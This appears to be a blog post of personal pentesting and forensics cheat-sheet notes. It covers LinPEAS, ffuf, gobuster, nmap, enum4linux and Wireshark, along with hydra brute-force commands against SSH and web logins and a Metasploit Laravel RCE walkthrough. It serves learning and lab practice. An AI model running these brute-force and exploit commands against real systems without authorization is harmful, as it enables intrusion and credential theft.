Privilege escalation
LinPEAS — Linux Privilege Escalation Awesome Script
github: https://github.com/carlospolop/PEASS-ng/tree/master/linPEAS
sudo wget https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh
scp linpeas.sh ramen@$ip:/dev/shm
note:
→"SCP" stands for "Secure Copy Protocol." It is a command line tool in Linux and other Unix-based operating systems that allows users to securely transfer files between computers.
→"/dev/shm" is a directory on Linux and Unix-based systems that is used for shared memory.It is also worth noting that the content of /dev/shm is usually not persistent across reboots, and will be deleted upon reboot or unmount.chmod 700 linpeas.sh
./linpeas.sh
Email Analysis
— emlAnalyzer
- email reputation check: https://emailrep.io/
INQUEST LABS (INDICATOR LOOKUP)
Like virustotal.InQuest provides a complete network forensics picture, from session details such as header information to file details such as the hash, size, type and even the raw file.
WEB
FFUF
ffuf is a command-line tool used for web application fuzzing and content discovery.
ffuf -u http://example.com/FUZZ -w wordlist.txt -e php -c 50 -fc 10
ffuf -u http://$ip/FUZZ -w wordlist.txt -e php -c 50 -fc 10
ffuf -u http://$ip/FUZZ -w /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -c 50 -fc 10Here are some commonly used options in the ffuf command:
-w: Specifies the wordlist to use for fuzzing-c: Specifies the number of concurrent connections to use (default is 40)-r: Specifies the request file containing the request to be fuzzed-e: Specifies the extensions to be used in the fuzzing process-fc: Specifies the number of failed responses to be ignored before ffuf stops (default is 0)-v: Enables verbose output, showing each request as it is sent
wfuf
Brutefouce login:
gobuster
(fuzzing)
gobuster dir -u <URL> -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt -x sh,cgi,php,txt,html,js,css,py
gobuster dir -u <URL> -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt
gobuster dir -u <URL> -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt
— — — — — — — — — — — — — — — — — — — — — — — -
seclist directory: /usr/share/wordlists/seclists/Discovery/Web-Content/big.txt
CyberChef
Defang URL: rendered harmlessly
Defang IP Address:
How to use cyberchef:
enum4linux
Enum4linux is a tool for enumerating information from Windows and Samba systems.
command:
enum4linux -U -o 192.168.1.200
Attempt to get the user list (-U) and OS information (-o) from the target (192.168.1.200):
enum4linux -h
Options are (like “enum”):
-U | get userlist
-M | get machine list*
-S | get sharelist
-P | get password policy information
-G | get group and member list
-d | be detailed, applies to -U and -S
-u user | specify username to use (default “”)
-p pass | specify password to use (default “”)
nmap
nmap -v -A -sV 192.168.1.1
Scan in verbose mode (-v), enable OS detection, version detection, script scanning, and traceroute (-A), with version detection (-sV) against the target IP (192.168.1.1):
Save the output of Nmap: Syntax: nmap -oN </path/filename.txt> <target>
nmap -sS -p- -O — script vuln -T1 -v www.<website>
-v → verbosity
-sS →stealth scan
-p- → all ports
-O → os detection
-D → decoy
use the scripting engine→ — script
use all the scripts in vuln→ — script vuln
• Ping Scan: Allows scanning the live hosts in the network without going deeper and checking for ports services etc. Usage: nmap -sn 10.10.13.38.
•
• Operating System Scan: Allows scanning of the type of OS running on a live host. Usage: nmap -O 10.10.13.38.
• Detecting Services: Get a list of running services on a live host. Usage: nmap -sV 10.10.13.38
• TCP SYN Scan: Get the list of live hosts and associated ports on the hosts without completing the TCP three-way handshake and making the scan a little stealthier. Usage: nmap -sS 10.10.13.38
•
/usr/share/nmap/scripts → head script.db →
Entry { filename = “acarsd-info.nse”, categories = { “discovery”, “safe”, } }
Entry { filename = “address-info.nse”, categories = { “default”, “safe”, } }
Entry { filename = “afp-brute.nse”, categories = { “brute”, “intrusive”, } }
Entry { filename = “afp-ls.nse”, categories = { “discovery”, “safe”, } }
Entry { filename = “afp-path-vuln.nse”, categories = { “exploit”, “intrusive”, “vuln”, } }
Entry { filename = “afp-serverinfo.nse”, categories = { “default”, “discovery”, “safe”, } }
Entry { filename = “afp-showmount.nse”, categories = { “discovery”, “safe”, } }
Entry { filename = “ajp-auth.nse”, categories = { “auth”, “default”, “safe”, } }
Entry { filename = “ajp-brute.nse”, categories = { “brute”, “intrusive”, } }
Entry { filename = “ajp-headers.nse”, categories = { “discovery”, “safe”, } }
hydra
hydra -l user -P passlist.txt ftp://<IP>
another way :
hydra -l molly -P /opt/rockyou.txt <IP> -t 4 ssh
brute force web login →
hydra -l molly -P /opt/rockyou.txt <IP> http-post-form “/login:username=^USER^&password=^PASS^:F=Your username or password is incorrect”
hydra -l Reese -P /opt/rockyou.txt <IP> http-post-form “/login:username=Reese&password=^PASS^:Authentication failed”
reffer::: https://infinitelogins.com/2020/02/22/how-to-brute-force-websites-using-hydra/
find sha256 hash value
(checksum)
sha256sum <path to file>
shred
shred prevents the recovery of deleted files in Linux by overwriting the deleted file with random data.
shred [options] [filename]
shred -nuvf 10 [path]
- n Specifies the number of overwrites.
-u Overwrite and delete.
-s Amount of bytes to shred.
-v Show extended information.
-f Force shred command.
-z Hide shredding.
— version shred version information.
— help Display help.
site: https://phoenixnap.com/kb/shred-linux
tar
tar -xvzf
x — instructs tar to extract the files from the zipped file
v — means verbose, or to list out the files it’s extracting
z — instructs tar to decompress the files — without this, you’d have a folder full of compressed files
f — tells tar the filename you want it to work on
gunzip
multiple files:
Syntax:
gunzip [file1] [file2] [file3]...Many other flags for gzip refer: https://www.geeksforgeeks.org/gunzip-command-in-linux-with-examples/
redshift
an application that adjusts the computer display’s color temperature/reading mode/night light
redshift -O 4000K -r -P
redshift -p : detect current temperature
Metasploit
Type: msfconsole
# To search for a module, use the ‘search’ command:
msf6 > search laravel
#Load a module with the ‘use’ command
msf6 > use multi/php/ignition_laravel_debug_rce
#view the information about the module, including the module options, description, CVE details, etc
msf6 exploit(multi/php/ignition_laravel_debug_rce) > info
# View the available options to set
show options
# Set the target host and logging
set rhost <victim_ip>
set verbose true
# Set the payload listening address; this is the IP address of the host running Metasploit
set lhost LISTEN_IP(our_ip)
# show options again
show options
# Run or check the module
check
run
exploit
FORENSICS
binwalk (image forensics)
(1) Scan to identify code, files, and other information
$ binwalk <firmware-image>(2)Extract files from firmware
$ binwalk -e <firmware-image>Volatility
Volatility is an open-source memory forensics toolkit written in Python
volatility3.plugins package: https://volatility3.readthedocs.io/en/latest/volatility3.plugins.html
Detect It Easy (DIE)
(forensics)In Windows right-click the sample and execute Detect It Easy (DIE). This tool provides information about the file, such as its architecture, significant headers, packer used, and strings
Github: https://github.com/horsicq/Detect-It-Easy
- Note: Strings are pieces of text inside a binary, often containing information such as IP addresses, URLs, or file names used by the malicious program.
CAPA
(forensics)CAPA detects capabilities in executable files. May it be for the installation of a service, invocation of network connections, registry modifications and such.
Wireless
wireshark
To analyze a packet you can open the tool, drag and drop the file, or use the “File” menu.
- Use the “Statistics → Protocol Hierarchy” menu to view the overall usage of the ports and services.
We can see the TCP and UDP packets percentage below:
To view the list of IP conversations use the “Statistics → Conversations” section and navigate to the IPv4 section
which TCP port number has received more packets: go to TCP-3
3389 →RDP (Remote Desktop Protocol)
Filter the DNS packets:
We have the domain name and IP address:
Filter: “tcp”,”http”, “smtp”, “udp”, “dns”
ip.addr==<IP address>
tcp.dstport==80
Filter HTTP:
Resolve domain address: “view”
To
Save a filter and use whenever needed:
WINDOWS
crackmapexec
This package is a swiss army knife for pentesting Windows/Active Directory environments.
nmblookup
nmblookup is a command-line utility that allows you to query a Windows server for NetBIOS information, such as the list of shared resources. On a Linux system, you can use nmblookup to enumerate the shared resources on a Windows system.
MITMPROXY
mitmproxy2swagger
sudo mitmproxy2swagger -i flows -o spec.yml -p http://localhost:8888 -f flow
vim spec.yml
mitmproxy2swagger -i flows -o spec.yml -p http://localhost:8888 -f flow --examples
Comments
Post a Comment